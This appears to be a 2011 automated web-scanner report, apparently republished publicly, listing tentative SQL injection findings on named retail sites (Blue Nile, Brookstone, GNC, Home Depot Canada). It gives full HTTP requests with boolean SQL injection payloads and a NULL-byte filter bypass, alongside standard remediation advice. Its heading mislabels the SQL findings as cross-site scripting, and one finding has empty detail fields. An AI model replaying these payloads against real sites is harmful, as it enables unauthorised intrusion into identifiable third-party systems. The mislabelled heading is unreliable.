XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05162011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://img.bluenile.com
Path:	/is/image/bluenile/txttemp_hdr_h5

Issue detail

The $layer_2_text_4 parameter appears to be vulnerable to SQL injection attacks. The payloads 15710605'%20or%201%3d1--%20 and 15710605'%20or%201%3d2--%20 were each submitted in the $layer_2_text_4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d1--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 1

HTTP/1.1 200 OK
Content-Length: 3264
Content-Type: image/gif
ETag: "68a098526d9c663ce408d5bf0d8d4097"
Expires: Thu, 30 Jun 2011 02:11:23 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:18 GMT
Connection: keep-alive

GIF89a..-...........">...Yj}v........\m.......D\...BVk................0J.........6KbTfz:Ne.... <l|.............2G_Zj~......K^r...}..t..dt........*F...............<Pg.............$@....,G...]m.......~..$;T............"8R...Rdx......'>W...Pbvr..kz....................(D
#@......4Ia...q..z...4N@Tj5Ja.........9Ne...o~........%A..................fv.br.DWl........<...Xi|..97Lc.5P.,H.....6.........FYn.........hx.I\q..;............=Qh...3H``p...I...8Ldx...........jz.J\r...... 7Q...|..~..#:T......;OfN`t%<U[l......s.....................%Bp....Vh{...PbuWh|H[pOavObv......^n.CVl)@X+B[.(D..<?Ri....2MTey,BZ.........*@Y
#?=Rh#;S%<Var.............GZp...&=V.-I(?W...z.. 8Qiy.M_t......_p....0E^...2H_.C\0F^./Jl{.r..)?X......m}.ct.........................Vg{.'C+AZ...n}..1L.......(C....3M_o.!.......,......-........H......*\......#J.H.....3B. ...*..*....".........O....3...%..... =...
.PJ..[.....d.@..T.(aB.(....Q.5@..z..a1F.6E...4!...2..T.......n.,......x..$........,..!D...h.....K-A( ...K.Vp
@..#I&.Xb.
.m.8y.U ..Q.y.....46.&......'..+0... .l~.....+=..)......\.9.`)a......)i.Z...a..&1Y..l.b`..e...@f...    ..$.@P...s..!.@..0.@.T'.$.d..&.....].......AO.'P......@LW..s\X...    ....i(.$H...r..Q..L.&..............3..V.2.@h.`\;.R..}XR. k.t...$.
(...D..}..!.@.$..4.D........0B..m..........QAu.......qB!..QP..(P.'>t.    ..0........%...I.j....X...@...G....@......J.q.N.......P..(.....8.!E .....!......IY........../@...............,....l...'....7...'..5.T.
...;P... ....L...    QP...X.*.8....`,P....I=.Y..D;3<..sp...X    d.9=......R46%."5#.<........_T;... ..@S.B...P    @..4...N.A.E.h!.D. A...+.B.&O.A......@..AP6#....X.....T.h2..T....1...u..F5xp.A..Q......@...W.+$x.3.$..."....i..@8.../..rIA........FFe.C.;.d.}...=....`.Lm....'%t.....53;..
2....4......E..S.!.AT.    .....x...a. ..p....../.h.~....p.XLCL...AX..... ..F....%pN W...
...X..X...8%.[T"yx.....b...... A.......t...."....o...C:.r>.p..Q(H..Q.2.a .h.@.P.....AI...A    ;xL .8.@.aG.\.........:$....^3...F6.{.h...&.... .X@Ata....k.X.@:...0c.......6.|.....~...#......!.B.s.D....0.....n U$H.D .-...z.W%..K. . 'h.A&1.s......X0 ..A
...6R.......Q.. (.s......d"...4..z.If. `.+.%..iEh.P.=t..q H%8`.u`g ..M.d./v..'#.F..`.H...(......
...[SNIP]...

Request 2

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d2--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 2

HTTP/1.1 200 OK
Content-Length: 3283
Content-Type: image/gif
ETag: "6cd3f5060d003d4a8b293ab0f32fb5b0"
Expires: Thu, 30 Jun 2011 02:11:42 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:19 GMT
Connection: keep-alive

GIF89a..-...........!>...Yj}Tey......\m.......D\...BVk................0J.........6Kb~..:Ne.... <l|.............2G_Zj~......K^r...}..t..dt........*F......o~.......<Pg.............$@v...,G...]m.......~..$;T............"8R...Rdx......'>W...Pbvr..kz....................(D
#@......4IaJ\rq..z....9@Tj5Ja.........9Ne....4N.......%A..................fv.br.DWl........<...Xi|.5P7LcFYn.,H.....6`p...................hx.I\q..;............=Qh...3H`x....I...8Ld............jz.......... 7Q...|..Vh{#:T.........;OfN`t%<U[l......s.....................%Bp....H[p(>WPbuWh|^n.OavObv......CVl)@X 8Q+B[..._o...<?Ri....2M,BZ.........*@YL_s=Rh#;S%<Var.......H[o......GZp...p.&=V.-I...z..iy.M_t........._p.......0E^...2H_.C\0F^..../Jl{.r..)?X......m}.ct.......n}.................'C+AZ....1L.......(C.3M!.......,......-........H......*\......#J.H.....3B. ...*..*....&.........O...X3...%.....`....
.`..    \.......@..V.(aB )..q.Q.5@..z..a1F 7E...4!...2..T......6n........x..$........,..!D...h.....M-A( ...K.Vp
@..#I&.Xr.
.m.8y.U ..Q.y.....46.&......'..+p... .l~.....+=..)......\.9..........)i.Z...a..&1Y..l.b`..e...@f...    ..$.@....s..!.@..0.@.T'.$...B$.....].......AO.'P...q..@LW.<.\X...    ....i(.$H...r..Q..L.&..............3...2.@h.`\<....}dQ....t...$.J(...D..}..".@.$....D........0B..q..........QAu........E!Y.QP..(`.'>t.    ..0........%...    .j....X...@...G....@......J.q.N.l.....g..(.....D.!E Xa...!......IY..........V`...............,....l...'....7....'.
6.T.
..    BP... ....L...    Q....X.*.8....`,P....    >.Y.BD.x s.Sh1.W*|..@6..3SK......p.....d...tD
|..@.l..,.M.K1..B%.......8...q.E9..r....x..
..d..qPa.@..5P<j......"........."....C.1n.D..rt.i.....2.=.G....*..R.(.).B..Es...y./B..@.+......)".(......hY.AodTF>........=...d.4....Lm........"...J..5..@5.%... H;.@..Lc.O1H)..
O0..~...
`. .Aq....../.h.h
......\XCL...AZ..... . ......    d    ...........Y...V...N    ...x....6..a.6..2H..X...3 E.
..]H...(B..0.?.. .3.7........yA.....<.......q,....\..@.p...#...D(.....a.tH..z.=g....t...2.../!*4.&.P.]X .6.@=V$..0..|..@8..}.M ..GA........!#7..I..`....*...8.......z....@K..f!.....S J;.    .@.IL.\...@......R../f....#..Y...0(.u. ..`$%...4H.{...".....a-. .+B.....C,..A*....#{...n. .xY..8..1Z..
...[SNIP]...

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.brookstone.com
Path:	/b/ss/bstoneprod/1/H.21/s08547089211642

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 404
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html

1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://metrics.gnc.com
Path:	/b/ss/gsicgncf/1/H.20.3/s37654085024105

Issue detail

Remediation detail

Request 1

GET /b/ss%00'/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
xserver: www408
Content-Length: 0
Content-Type: text/html

1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.homedepot.ca
Path:	/webapp/wcs/stores/servlet/Home

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:34 GMT
Content-Length: 94929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara Interior Design Window Film - Rice Paper</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$34.95</span><span class="new-price">$29.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:35 GMT
Content-Length: 95035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$39.99</span><span class="new-price">$34.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M</a>
</p>
<p class="prod-desc">
